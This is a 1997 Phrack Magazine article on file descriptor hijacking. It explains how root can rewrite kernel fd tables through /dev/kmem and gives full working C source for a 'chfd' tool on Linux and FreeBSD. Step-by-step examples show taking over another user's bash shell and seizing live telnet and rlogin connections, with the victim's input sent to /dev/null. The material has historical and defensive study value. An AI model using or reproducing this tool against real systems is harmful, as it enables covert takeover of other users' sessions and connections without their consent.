| ---[ Phrack Magazine Volume 7, Issue 51 September 01, 1997, article 05 of 17 |
|
|
|
|
| -------------------------[ File Descriptor Hijacking |
|
|
|
|
| --------[ orabidoo <odar@pobox.com> |
|
|
|
|
| Introduction |
| ------------ |
|
|
| We often hear of tty hijacking as a way for root to take over a user's |
| session. The traditional tools for this use STREAMS on SysV machines, |
| and one article in Phrack 50 presented a way to do it in Linux, using |
| loadable modules. |
|
|
| I'll describe here a simple technique that lets root take over a local |
| or remote session. I've implemented it for Linux and FreeBSD; it should |
| be easy to port it to just about any Un*x-like system where root can |
| write to kernel memory. |
|
|
| The idea is simple: by tweaking the kernel's file descriptor tables, one |
| can forcefully move file descriptors from one process to another. |
| This method allows you to do almost anything you want: redirect the |
| output of a running command to a file, or even take over your neighbor's |
| telnet connection. |
|
|
|
|
| How the kernel keeps track of open file descriptors |
| --------------------------------------------------- |
|
|
| In Un*x, processes access resources by means of file descriptors, which |
| are obtained via system calls such as open(), socket() and pipe(). From |
| the process's point of view, the file descriptor is an opaque handle to |
| the resource. File descriptors 0, 1 and 2 represent standard input, |
| output and error, respectively. New descriptors are always allocated in |
| sequence. |
|
|
| On the other side of the fence, the kernel keeps, for each process, a |
| table of file descriptors (fds), with a pointer to a structure for each |
| fd. The pointer is NULL if the fd isn't open. Otherwise, the structure |
| holds information about what kind of fd it is (a file, a socket, a |
| pipe, etc), together with pointers to data about the resource that the fd |
| accesses (the file's inode, the socket's address and state information, |
| and so on). |
|
|
| The process table is usually an array or a linked list of structures. |
| From the structure for a given process, you can easily find a pointer to |
| the internal fd table for that process. |
|
|
| In Linux, the process table is an array (called "task") of struct |
| task_struct's, and includes a pointer to a struct files_struct, which |
| has the fd array (look at /usr/include/linux/sched.h for details). In |
| SunOS 4, the process table is a linked list of struct proc's, which |
| include a pointer to the u_area, which has info about the fds (look at |
| /usr/include/sys/proc.h). In FreeBSD, it's also a linked list (called |
| "allproc") of struct proc's, which include a pointer to a struct |
| filedesc with the fd table (also according to /usr/include/sys/proc.h). |
|
|
| If you have read and write access to the kernel's memory (which, in most |
| cases, is the same as having read/write access to /dev/kmem), there's |
| nothing to prevent you from messing with these fd tables, stealing open |
| fd's from a process and reusing them in another one. |
|
|
| The only major case where this won't work are systems based on BSD4.4 |
| (such as {Free, Net, Open}BSD) running at a securelevel higher than 0. |
| In that mode, write access to /dev/mem and /dev/kmem is disabled, among |
| other things. However, many BSD systems run at securelevel -1, which leaves |
| them vulnerable, and in many others it may be possible to get the securelevel |
| to be -1 at the next boot by tweaking the startup scripts. On FreeBSD, you |
| can check the securelevel with the command "sysctl kern.securelevel". Linux |
| also has securelevels, but they don't prevent you from accessing /dev/kmem. |
|
|
|
|
| File descriptor hijacking |
| ------------------------- |
|
|
| The kernel's internal variables are really not made to be modified like |
| this by user programs, and it shows. |
|
|
| First of all, on a multitasking system, you have no guarantee that the |
| kernel's state won't have changed between the time you find out a |
| variable's address and the time you write to it (no atomicity). This is |
| why these techniques shouldn't be used in any program that aims for |
| reliability. That being said, in practice, I haven't seen it fail, because |
| the kernel doesn't move this kind of data around once it has allocated it |
| (at least for the first 20 or 32 or 64 or so fds per process), and because |
| it's quite unlikely that you'll do this just when the process is closing or |
| opening a new fd. |
|
|
| You still want to try it? |
|
|
| For simplicity's sake, we won't try to do things like duplicating an fd |
| between two processes, or passing an fd from one process to another |
| without passing another one in return. Instead, we'll just exchange an |
| fd in one process with another fd in another process. This way we only |
| have to deal with open files, and don't mess with things like reference |
| counts. This is as simple as finding two pointers in the kernel and |
| switching them around. A slightly more complicated version of this |
| involves 3 processes, and a circular permutation of the fds. |
|
|
| Of course, you have to guess which fd corresponds to the resource you |
| want to pass. To take complete control of a running shell, you'll want |
| its standard input, output and error, so you'll need to take the 3 fds |
| 0, 1 and 2. To take control of a telnet session, you'll want the fd of |
| the inet socket that telnet is using to talk to the other side, which is |
| usually 3, and exchange it with another running telnet (so it knows what |
| to do with it). Under Linux, a quick look at /proc/[pid]/fd will tell |
| you which fds the process is using. |
|
|
|
|
| Using chfd |
| ---------- |
|
|
| I've implemented this for Linux and FreeBSD; it would be fairly easy to |
| port to other systems (as long as they let you write to /dev/mem or |
| /dev/kmem, and have the equivalent of a /usr/include/sys/proc.h to |
| figure out how it works). |
|
|
| To compile chfd for Linux, you need to figure out a couple things about |
| the running kernel. If it's a 1.2.13 or similar, you'll need to |
| uncomment the line /* #define OLDLINUX */, because the kernel's |
| structures have changed since then. If it's 2.0.0 or newer, it should |
| work out of the box, although it could change again... |
|
|
| Then you need to find the symbol table for the kernel, which is usually |
| in /boot/System.map or similar. Make sure this corresponds to the |
| kernel that is actually running, and look up the address for the "task" |
| symbol. You need to put this value in chfd, instead of "00192d28". |
| Then compile with "gcc chfd.c -o chfd". |
|
|
| To compile chfd for FreeBSD, just get the FreeBSD code and compile it |
| with "gcc chfd.c -o chfd -lkvm". This code was written for FreeBSD |
| 2.2.1, and might need tweaking for other versions. |
|
|
| Once it's compiled, you invoke chfd with |
|
|
| chfd pid1 fd1 pid2 fd2 |
| or |
| chfd pid1 fd1 pid2 fd2 pid3 fd3 |
|
|
| In the first case, the fds are just swapped. In the second case, the |
| second process gets the first's fd, the third gets the second's fd, and |
| the first gets the third's fd. |
|
|
| As a special case, if one of the pids is zero, the corresponding fd is |
| discarded, and a fd on /dev/null is passed instead. |
|
|
|
|
| Example 1 |
| --------- |
|
|
| . a long calculation is running with pid 207, and with output to the tty |
| . you type "cat > somefile", and look up cat's pid (say 1746) |
|
|
| Then doing |
|
|
| chfd 207 1 1746 1 |
|
|
| will redirect the calculation on the fly to the file "somefile", and the |
| cat to the calculation's tty. Then you can ^C the cat, and leave the |
| calculation running without fear of important results scrolling by. |
|
|
|
|
| Example 2 |
| --------- |
|
|
| . someone is running a copy of bash on a tty, with pid 4022 |
| . you are running another copy of bash on a tty, with pid 4121 |
|
|
| Then you do |
|
|
| sleep 10000 |
| # on your own bash, so it won't read its tty for a while, |
| # otherwise your shell gets an EOF from /dev/null and leaves |
| # the session immediately |
| chfd 4022 0 0 0 4121 0 |
| chfd 4022 1 0 0 4121 1 |
| chfd 4022 2 0 0 4121 2 |
|
|
| and you find yourself controlling the other guy's bash, and getting the |
| output too, while the guy's keystrokes go to /dev/null. When you exit |
| the shell, he gets his session disconnected, and you're back in your |
| sleep 10000 which you can safely ^C now. |
|
|
| Different shells might use different file descriptors; zsh seems to use |
| fd 10 to read from the tty, so you'll need to exchange that too. |
|
|
|
|
| Example 3 |
| --------- |
|
|
| . someone is running a telnet on a tty, with pid 6309 |
| . you start a telnet to some worthless port that won't drop the |
| connection too quickly (telnet localhost 7, telnet www.yourdomain 80, |
| whatever), with pid 7081 |
| . under Linux, a quick look at /proc/6309/fd and /proc/7081/fd tells you |
| telnet is using fds 0, 1, 2 and 3, so 3 must be the connection. |
|
|
| Then doing |
|
|
| chfd 6309 3 7081 3 0 0 |
|
|
| will replace the network connection with a /dev/null on the guy's telnet |
| (which reads an EOF, so he'll get a "Connection closed by foreign |
| host."), and your telnet finds itself connected to the guy's remote |
| host. At this point you'll probably need to press ^] and type "mode |
| character" to tell your telnet to stop echoing your lines locally. |
|
|
|
|
| Example 4 |
| --------- |
|
|
| . someone is running an rlogin on a tty; each rlogin uses two processes, |
| with pids 4547 and 4548 |
| . you start an rlogin localhost on another tty, with pids 4852 and 4855 |
| . a quick look at the relevant /proc/../fds tells you that each of the |
| rlogin processes is using fd 3 for the connection. |
|
|
| Then doing |
|
|
| chfd 4547 3 4552 3 |
| chfd 4548 3 4555 3 |
|
|
| does just what you expect. Except that your rlogin may still be blocked |
| by the kernel because it's waiting on an event that won't happen (having |
| data to read from localhost); in that case you wake it up with a kill |
| -STOP followed by 'fg'. |
|
|
|
|
| You get the idea. When a program gets another one's fd, it's important |
| that it knows what to do with it; in most cases you achieve this by |
| running a copy of the same program you want to take over, unless you're |
| passing a fd on /dev/null (which gives an EOF) or just passing |
| stdin/stdout/stderr. |
|
|
|
|
| Conclusion |
| ---------- |
|
|
| As you can see, you can do quite powerful things with this. And there |
| isn't really much you can do to protect yourself from some root doing |
| this, either. |
|
|
| It could be argued that it's not even a security hole; root is |
| *supposed* to be able to do these things. Otherwise there wouldn't be |
| explicit code in the drivers for /dev/kmem to let you write there, would |
| there? |
|
|
|
|
| The Linux code |
| -------------- |
|
|
| <++> fd_hijack/chfd-linux.c |
| /* chfd - exchange fd's between 2 or 3 running processes. |
| * |
| * This was written for Linux/intel and is *very* system-specific. |
| * Needs read/write access to /dev/kmem; setgid kmem is usually enough. |
| * |
| * Use: chfd pid1 fd1 pid2 fd2 [pid3 fd3] |
| * |
| * With two sets of arguments, exchanges a couple of fd between the |
| * two processes. |
| * With three sets, the second process gets the first's fd, the third gets |
| * the second's fd, and the first gets the third's fd. |
| * |
| * Note that this is inherently unsafe, since we're messing with kernel |
| * variables while the kernel itself might be changing them. It works |
| * in practice, but no self-respecting program would want to do this. |
| * |
| * Written by: orabidoo <odar@pobox.com> |
| * First version: 14 Feb 96 |
| * This version: 2 May 97 |
| */ |
|
|
|
|
| #include <stdio.h> |
| #include <unistd.h> |
| #include <fcntl.h> |
| #define __KERNEL__ /* needed to access kernel-only definitions */ |
| #include <linux/sched.h> |
|
|
| /* #define OLDLINUX */ /* uncomment this if you're using Linux 1.x; |
| tested only on 1.2.13 */ |
|
|
| #define TASK 0x00192d28 /* change this! look at the system map, |
| usually /boot/System.map, for the address |
| of the "task" symbol */ |
|
|
| #ifdef OLDLINUX |
| # define FD0 ((char *)&ts.files->fd[0] - (char *)&ts) |
| # define AD(fd) (taskp + FD0 + 4*(fd)) |
| #else |
| # define FILES ((char *)&ts.files - (char *)&ts) |
| # define FD0 ((char *)&fs.fd[0] - (char *)&fs) |
| # define AD(fd) (readvalz(taskp + FILES) + FD0 + 4*(fd)) |
| #endif |
|
|
|
|
| int kfd; |
| struct task_struct ts; |
| struct files_struct fs; |
| int taskp; |
|
|
| int readval(int ad) { |
| int val, r; |
|
|
| if (lseek(kfd, ad, SEEK_SET) < 0) |
| perror("lseek"), exit(1); |
| if ((r = read(kfd, &val, 4)) != 4) { |
| if (r < 0) |
| perror("read"); |
| else fprintf(stderr, "Error reading...\n"); |
| exit(1); |
| } |
| return val; |
| } |
|
|
| int readvalz(int ad) { |
| int r = readval(ad); |
| if (r == 0) |
| fprintf(stderr, "NULL pointer found (fd not open?)\n"), exit(1); |
| return r; |
| } |
|
|
| void writeval(int ad, int val) { |
| int w; |
|
|
| if (lseek(kfd, ad, SEEK_SET) < 0) |
| perror("lseek"), exit(1); |
| if ((w = write(kfd, &val, 4)) != 4) { |
| if (w < 0) |
| perror("write"); |
| else fprintf(stderr, "Error writing...\n"); |
| exit(1); |
| } |
| } |
|
|
| void readtask(int ad) { |
| int r; |
|
|
| if (lseek(kfd, ad, SEEK_SET)<0) |
| perror("lseek"), exit(1); |
| if ((r = read(kfd, &ts, sizeof(struct task_struct))) != |
| sizeof(struct task_struct)) { |
| if (r < 0) |
| perror("read"); |
| else fprintf(stderr, "Error reading...\n"); |
| exit(1); |
| } |
| } |
|
|
| void findtask(int pid) { |
| int adr; |
|
|
| for (adr=TASK; ; adr+=4) { |
| if (adr >= TASK + 4*NR_TASKS) |
| fprintf(stderr, "Process not found\n"), exit(1); |
| taskp = readval(adr); |
| if (!taskp) continue; |
| readtask(taskp); |
| if (ts.pid == pid) break; |
| } |
| } |
|
|
| int main(int argc, char **argv) { |
| int pid1, fd1, pid2, fd2, ad1, val1, ad2, val2, pid3, fd3, ad3, val3; |
| int three=0; |
|
|
| if (argc != 5 && argc != 7) |
| fprintf(stderr, "Use: %s pid1 fd1 pid2 fd2 [pid3 fd3]\n", argv[0]), |
| exit(1); |
|
|
| pid1 = atoi(argv[1]), fd1 = atoi(argv[2]); |
| pid2 = atoi(argv[3]), fd2 = atoi(argv[4]); |
| if (argc == 7) |
| pid3 = atoi(argv[5]), fd3 = atoi(argv[6]), three=1; |
|
|
| if (pid1 == 0) |
| pid1 = getpid(), fd1 = open("/dev/null", O_RDWR); |
| if (pid2 == 0) |
| pid2 = getpid(), fd2 = open("/dev/null", O_RDWR); |
| if (three && pid3 == 0) |
| pid3 = getpid(), fd3 = open("/dev/null", O_RDWR); |
|
|
| kfd = open("/dev/kmem", O_RDWR); |
| if (kfd < 0) |
| perror("open"), exit(1); |
|
|
| findtask(pid1); |
| ad1 = AD(fd1); |
| val1 = readvalz(ad1); |
| printf("Found fd pointer 1, value %.8x, stored at %.8x\n", val1, ad1); |
|
|
| findtask(pid2); |
| ad2 = AD(fd2); |
| val2 = readvalz(ad2); |
| printf("Found fd pointer 2, value %.8x, stored at %.8x\n", val2, ad2); |
|
|
| if (three) { |
| findtask(pid3); |
| ad3 = AD(fd3); |
| val3 = readvalz(ad3); |
| printf("Found fd pointer 3, value %.8x, stored at %.8x\n", val3, ad3); |
| } |
|
|
| if (three) { |
| if (readval(ad1)!=val1 || readval(ad2)!=val2 || readval(ad3)!=val3) { |
| fprintf(stderr, "fds changed in memory while using them - try again\n"); |
| exit(1); |
| } |
| writeval(ad2, val1); |
| writeval(ad3, val2); |
| writeval(ad1, val3); |
| } else { |
| if (readval(ad1)!=val1 || readval(ad2)!=val2) { |
| fprintf(stderr, "fds changed in memory while using them - try again\n"); |
| exit(1); |
| } |
| writeval(ad1, val2); |
| writeval(ad2, val1); |
| } |
| printf("Done!\n"); |
| } |
|
|
| <--> |
|
|
| The FreeBSD code |
| ---------------- |
|
|
| <++> fd_hijack/chfd-freebsd.c |
|
|
| /* chfd - exchange fd's between 2 or 3 running processes. |
| * |
| * This was written for FreeBSD and is *very* system-specific. Needs |
| * read/write access to /dev/mem and /dev/kmem; only root can usually |
| * do that, and only if the system is running at securelevel -1. |
| * |
| * Use: chfd pid1 fd1 pid2 fd2 [pid3 fd3] |
| * Compile with: gcc chfd.c -o chfd -lkvm |
| * |
| * With two sets of arguments, exchanges a couple of fd between the |
| * two processes. |
| * With three sets, the second process gets the first's fd, the third |
| * gets the second's fd, and the first gets the third's fd. |
| * |
| * Note that this is inherently unsafe, since we're messing with kernel |
| * variables while the kernel itself might be changing them. It works |
| * in practice, but no self-respecting program would want to do this. |
| * |
| * Written by: orabidoo <odar@pobox.com> |
| * FreeBSD version: 4 May 97 |
| */ |
|
|
|
|
| #include <stdio.h> |
| #include <fcntl.h> |
| #include <kvm.h> |
| #include <sys/proc.h> |
|
|
| #define NEXTP ((char *)&p.p_list.le_next - (char *)&p) |
| #define FILES ((char *)&p.p_fd - (char *)&p) |
| #define AD(fd) (readvalz(readvalz(procp + FILES)) + 4*(fd)) |
|
|
| kvm_t *kfd; |
| struct proc p; |
| u_long procp, allproc; |
| struct nlist nm[2]; |
|
|
| u_long readval(u_long ad) { |
| u_long val; |
|
|
| if (kvm_read(kfd, ad, &val, 4) != 4) |
| fprintf(stderr, "error reading...\n"), exit(1); |
| return val; |
| } |
|
|
| u_long readvalz(u_long ad) { |
| u_long r = readval(ad); |
| if (r == 0) |
| fprintf(stderr, "NULL pointer found (fd not open?)\n"), exit(1); |
| return r; |
| } |
|
|
| void writeval(u_long ad, u_long val) { |
| if (kvm_write(kfd, ad, &val, 4) != 4) |
| fprintf(stderr, "error writing...\n"), exit(1); |
| } |
|
|
| void readproc(u_long ad) { |
| if (kvm_read(kfd, ad, &p, sizeof(struct proc)) != sizeof(struct proc)) |
| fprintf(stderr, "error reading a struct proc...\n"), exit(1); |
| } |
|
|
| void findproc(int pid) { |
| u_long adr; |
|
|
| for (adr = readval(allproc); adr; adr = readval(adr + NEXTP)) { |
| procp = adr; |
| readproc(procp); |
| if (p.p_pid == pid) return; |
| } |
| fprintf(stderr, "Process not found\n"); |
| exit(1); |
| } |
|
|
| int main(int argc, char **argv) { |
| int pid1, fd1, pid2, fd2, pid3, fd3; |
| u_long ad1, val1, ad2, val2, ad3, val3; |
| int three=0; |
|
|
| if (argc != 5 && argc != 7) |
| fprintf(stderr, "Use: %s pid1 fd1 pid2 fd2 [pid3 fd3]\n", argv[0]), |
| exit(1); |
|
|
| pid1 = atoi(argv[1]), fd1 = atoi(argv[2]); |
| pid2 = atoi(argv[3]), fd2 = atoi(argv[4]); |
| if (argc == 7) |
| pid3 = atoi(argv[5]), fd3 = atoi(argv[6]), three=1; |
|
|
| if (pid1 == 0) |
| pid1 = getpid(), fd1 = open("/dev/null", O_RDWR); |
| if (pid2 == 0) |
| pid2 = getpid(), fd2 = open("/dev/null", O_RDWR); |
| if (three && pid3 == 0) |
| pid3 = getpid(), fd3 = open("/dev/null", O_RDWR); |
|
|
| kfd = kvm_open(NULL, NULL, NULL, O_RDWR, "chfd"); |
| if (kfd == NULL) exit(1); |
|
|
| bzero(nm, 2*sizeof(struct nlist)); |
| nm[0].n_name = "_allproc"; |
| nm[1].n_name = NULL; |
| if (kvm_nlist(kfd, nm) != 0) |
| fprintf(stderr, "Can't read kernel name list\n"), exit(1); |
| allproc = nm[0].n_value; |
|
|
| findproc(pid1); |
| ad1 = AD(fd1); |
| val1 = readvalz(ad1); |
| printf("Found fd pointer 1, value %.8x, stored at %.8x\n", val1, ad1); |
|
|
| findproc(pid2); |
| ad2 = AD(fd2); |
| val2 = readvalz(ad2); |
| printf("Found fd pointer 2, value %.8x, stored at %.8x\n", val2, ad2); |
|
|
| if (three) { |
| findproc(pid3); |
| ad3 = AD(fd3); |
| val3 = readvalz(ad3); |
| printf("Found fd pointer 3, value %.8x, stored at %.8x\n", val3, ad3); |
| } |
|
|
| if (three) { |
| if (readval(ad1)!=val1 || readval(ad2)!=val2 || readval(ad3)!=val3) { |
| fprintf(stderr, "fds changed in memory while using them - try again\n"); |
| exit(1); |
| } |
| writeval(ad2, val1); |
| writeval(ad3, val2); |
| writeval(ad1, val3); |
| } else { |
| if (readval(ad1)!=val1 || readval(ad2)!=val2) { |
| fprintf(stderr, "fds changed in memory while using them - try again\n"); |
| exit(1); |
| } |
| writeval(ad1, val2); |
| writeval(ad2, val1); |
| } |
| printf("Done!\n"); |
| } |
|
|
| <--> |
|
|
| ----[ EOF |
|
|
|
|